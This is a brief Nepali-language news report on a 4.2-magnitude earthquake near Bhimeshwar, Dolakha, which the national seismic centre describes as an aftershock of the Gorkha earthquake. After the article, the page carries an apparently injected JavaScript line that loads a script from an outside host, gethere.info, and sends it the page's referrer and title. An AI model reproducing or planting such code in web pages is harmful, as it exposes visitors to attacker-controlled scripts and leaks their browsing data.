Earthquake-21-624x468काठमाडौं, असोज २१ – शुक्रबार भूकम्पको धक्का महसुस भएको छ । दोलखाको भिमेश्वर नगरपालिका आसपास केन्द्रबिन्दु भएर भूकम्पको धक्का महसुस भएको हो ।
राष्ट्रिय भूकम्प मापन केन्द्रका अनुसार ४.२ रेक्टर स्केलको भूकम्प गएको हो । भूकम्पको धक्का दोलखा साथै आसपासका जिल्लाहरुमा महसुस भएको थियो ।
भूकम्प मापन केन्द्रले नयाँ भूकम्प नभएर गोरखा भूकम्पकै पराकम्प भएको जनाएको छ । यसअघि एक महिनाअघि सिन्धुपाल्चोक केन्द्रबिन्दु भएर ४.६ रेक्टर स्केलको धक्का महसुस भएको थियो ।

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;